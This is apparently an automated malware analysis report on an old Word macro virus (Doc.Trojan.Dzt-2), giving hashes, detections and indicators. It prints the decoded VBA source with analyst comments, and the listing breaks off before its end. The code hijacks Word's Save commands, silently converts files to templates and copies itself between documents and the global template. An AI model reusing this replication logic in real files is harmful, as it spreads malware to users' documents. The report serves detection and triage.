Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4a41b97c1984be6c…

MALICIOUS

Office (OLE)

37.0 KB Created: 1998-01-01 00:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 91ea05540c935585638669a1621802cf SHA-1: c54e7f03d49508f92857fd468422e017422ccea8 SHA-256: 4a41b97c1984be6ca865b5bf3a4967378a18e55de6568c9092c6c2ee69060c59
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV and contains legacy WordBasic auto-exec markers and VBA macros. The AutoOpen macro is present, suggesting an attempt to automatically execute malicious code upon opening. The VBA code includes logic to copy macros (the script preview below shows WordBasic.MacroCopy calls between a document's AutoOpen macro and Global:FileSave), indicating a potential mechanism for persistence or further payload execution, though the exact target is unclear.

Heuristics 4

  • ClamAV: Doc.Trojan.Dzt-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Dzt-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15978 bytes
SHA-256: 6bce6e4ce1ebdad64c795f64e670d67fb86dcfcc0a7af97b1768d67d7b2daf48
Detection
ClamAV: Doc.Trojan.Dzt-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Header of the document object "ThisDocument" as emitted by the macro extractor.
' No procedures follow it in this preview; the macro code shown further down is in
' the modules named FileSaveAs and FileSave.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Module "FileSaveAs". Its MAIN procedure is registered below as
' TemplateProject.FileSaveAs.MAIN and carries the description of Word's own
' Save As command. A Word macro named after a built-in command runs in place of
' that command, so this module sits on the user's Save As path.
Attribute VB_Name = "FileSaveAs"

' Module-level state shared by the procedures of this module.
' The identifiers look Indonesian (presumably "Filebaru" = new file, "salah" = error);
' FileMacro$ is the source name used by CopyAOtoG, Filebaru$ the destination name
' used by CopyAOF.
Dim Filebaru$, FileMacro$
Dim salah

' Entry point of the FileSaveAs macro.
' Only the prologue and epilogue are readable: the body is a WordBasic statement the
' decoder could not translate (Unrecognized_Statement63798), so what happens between
' DisableInput and the final assignment cannot be determined from this listing.
' NOTE(review): CopyAOtoG, CopyAOF and Aksi below are never called in the decoded
' text of this module; presumably the calls are inside the undecoded statement.
Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves a copy of the document in a separate file"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN"
' Reset the module state before doing anything else.
Filebaru$ = ""
FileMacro$ = ""
salah = 0
' WordBasic DisableInput 1 stops the ESC key from interrupting the running macro.
WordBasic.DisableInput (1)
' Decoder residue: the two physical lines below are one continued statement and are
' not valid source. Treat them as "logic not recovered", not as evidence of intent.
WordBasic.Unrecognized_Statement63798       Let                To     -1  String -1  >= -1   +1   +1  -1+1  'EndIf +1   : Redim   : Redim : Redim   Alias : Redim   Resume : Redim   : : Redim   Let : Redim    : Dim       Case _
  , Unrecognized_Argument49282  -    Step               : Redim                    Single        Select    Is       *    Then    Name      Select      Select      Select      Select      Select      Select      Select      Select      Select      Select      Select      Select      Select      Name      Name      Select      Name      Name      Name      Name      Select      Select      Select      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name      Name                 <=    Open                   )
' Keep the last error number in the module-level flag.
salah = Err.Number
End Sub

' Copies the macro "AutoOpen" from the document/template named in FileMacro$ into the
' global template under the name "FileSave" (the name reads as "copy AutoOpen to Global").
' Analyst note: this is the step that makes the code resident. A macro called FileSave
' in the global template that the user did not create is an indicator worth checking for.
Private Sub CopyAOtoG()
' Any error jumps to "finish", which does nothing: failures are silent.
On Error GoTo -1: On Error GoTo finish
' Third argument 1: in WordBasic's MacroCopy this is the execute-only flag, which
' makes the copied macro non-editable (TODO confirm against the WordBasic reference).
WordBasic.MacroCopy FileMacro$ + ":AutoOpen", "Global:FileSave", 1
finish:
End Sub

' Copies the global template's "FileSave" macro into the file named in Filebaru$ and
' names it "AutoOpen" there, i.e. the reverse direction of CopyAOtoG.
' Analyst note: together the two copies form the replication loop, global template to
' saved file and back, which is why the auto-exec heuristic fires on AutoOpen.
Private Sub CopyAOF()
' Any error jumps to "finish", which does nothing: failures are silent.
On Error GoTo -1: On Error GoTo finish
    ' Third argument 1: presumably the execute-only flag of MacroCopy (TODO confirm).
    WordBasic.MacroCopy "Global:FileSave", Filebaru$ + ":AutoOpen", 1
finish:
End Sub

' Writes a fixed author/marker text into the Comments field of the active document's
' summary information ("Aksi" is presumably Indonesian for "action").
' Analyst note: the string begins with "DZT'96", matching the ClamAV family name
' Doc.Trojan.Dzt-2, so the Comments property is a cheap triage indicator for
' documents this macro has touched. Nothing else is modified by this routine.
Private Sub Aksi()
' Any error jumps to "finish", which does nothing: failures are silent.
On Error GoTo -1: On Error GoTo finish
' Chr(13) is a carriage return; the marker is written as a multi-line comment.
WordBasic.FileSummaryInfo Comments:="DZT'96" + Chr(13) + "(c)9 April 1996 by Hikmat S/D0E94328" + Chr(13) + "comp. dept. of HFT" + Chr(13) + "Instrumentasi Elektronika" + Chr(13) + "MIPA Terapan Fakultas MIPA" + Chr(13) + "Universitas Padjadjaran" + Chr(13) + "Bandung"
finish:
End Sub


' Module "FileSave". Its MAIN procedure is registered below as
' TemplateProject.FileSave.MAIN and carries the description of Word's own Save
' command, so it runs whenever the user saves once it is present in a template.
Attribute VB_Name = "FileSave"

' Module-level state: formatfile holds the save format read from the Save As dialog
' record (or an error number, see CekFormat); salah is an error flag checked by
' SaveFile; Filebaru$ is the name of the file being saved.
Dim formatfile, salah
Dim Filebaru$

' Entry point of the FileSave macro: decides from the document statistics whether the
' document is treated as new (SaveTo, which shows the Save As dialog) or as an
' existing file (SaveFile -1).
Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
' Ukuran$ receives the file size (presumably Indonesian for "size"), Rev$ the
' revision number, Ls$ the last-saved value.
Dim Ukuran$
Dim Rev$
Dim Ls$
formatfile = 0
salah = 0
Filebaru$ = ""
' DisableInput 1 stops ESC from interrupting the macro; DisableAutoMacros 1 turns
' off Word's auto macros (AutoOpen and friends) while this routine runs.
WordBasic.DisableInput (1)
WordBasic.DisableAutoMacros (1)
' Any error from here on jumps to "finish".
On Error GoTo -1: On Error GoTo finish
' Read the current document statistics into a dialog record without showing a dialog.
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.DocumentStatistics(False)
WordBasic.CurValues.DocumentStatistics dlg
Ukuran$ = UCase(dlg.FileSize)
Rev$ = dlg.Revision
Ls$ = dlg.LastSaved
' Never-saved heuristic: zero size, revision 1, or no last-saved value.
If (Ukuran$ = "0 BYTES") Or (Rev$ = "1") Or (Ls$ = "") Then SaveTo
' NOTE(review): this is an Or of the three inequalities, not the negation of the
' line above, so both lines can fire for the same document (for example revision 1
' with a non-zero size).
If (Ukuran$ <> "0 BYTES") Or (Rev$ <> "1") Or (Ls$ <> "") Then SaveFile -1
finish:
' Reached on normal completion as well as on error. Error 509 falls back to the
' Save As path; the meaning of 509 is not shown in this listing.
If Err.Number = 509 Then SaveTo
End Sub

' Shows the Save As dialog, forces format 0 to format 1, records the chosen format and
' file name in module state, saves, and then hands over to SaveFile (0).
' Analyst note: in WordBasic's FileSaveAs, format 0 is a normal document and format 1
' a document template (TODO confirm against the WordBasic reference). Only templates
' can carry macros in these Word versions, so files the user saved as documents but
' that are stored as templates are a consequence to look for.
Private Sub SaveTo()
' NOTE(review): this local is "fileFormat"; the module-level variable assigned below
' is "formatfile". The local is never assigned in this routine.
Dim fileFormat
' Any error (presumably including the user cancelling the dialog) jumps to "finish".
On Error GoTo -1: On Error GoTo finish
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
' Display the dialog so the user picks name and location as usual.
WordBasic.Dialog.FileSaveAs dlg
' Override the user's choice of format 0 with format 1 before saving.
If dlg.Format = 0 Then dlg.Format = 1
formatfile = dlg.Format
Filebaru$ = dlg.Name
WordBasic.FileSaveAs dlg
finish:
' Because the local fileFormat is still unassigned here, the second comparison does
' not test the format that was actually saved; in effect only Err.Number decides.
If ((Err.Number = 0) And (fileFormat < 2)) Then SaveFile (0)
End Sub

' Saves the file in format 1 if needed, calls CopyToFile, then stamps the marker text
' and saves again.
' cek ("check", presumably): non-zero when called from MAIN (-1), meaning the file name
' and format still have to be read from Word; zero when called from SaveTo, which has
' already set Filebaru$ and formatfile.
Private Sub SaveFile(cek)
' Any error jumps to "finish".
On Error GoTo -1: On Error GoTo finish
If cek Then
    ' Existing file: take the active document's name and look up its save format.
    Filebaru$ = WordBasic.[FileName$]()
    CekFormat
End If
' Already format 1: copy straight away.
If formatfile = 1 Then CopyToFile
' Format 0: re-save under the same name as format 1 first, then copy.
If formatfile = 0 Then
    WordBasic.FileSaveAs Name:=Filebaru$, Format:=1
    CopyToFile
End If
' Any other formatfile value skips both branches and nothing is copied.
finish:
' Reached on normal completion as well as on error; salah gates the final step.
If salah = 0 Then
    ' NOTE(review): the visible Aksi is Private to the FileSaveAs module; a copy in
    ' this module is presumably beyond the truncation point of the preview.
    Aksi
    WordBasic.FileSave
End If
End Sub

' Reads the current save format from the Save As dialog record into the module-level
' formatfile, without displaying the dialog ("Cek" is presumably "check").
Private Sub CekFormat()
' Any error jumps to "finish".
On Error GoTo -1: On Error GoTo finish
Dim dlog As Object: Set dlog = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlog
formatfile = dlog.Format
finish:
' On failure formatfile is overwritten with the error number. SaveFile only acts on
' the values 0 and 1, so an error code other than those makes it skip the copy.
If Err.Number <> 0 Then formatfile = Err.Number
End Sub

Private Sub CopyToFile()
On Error GoTo -1: On Error GoTo finish
CekCopyToFile
If salah 
... (truncated)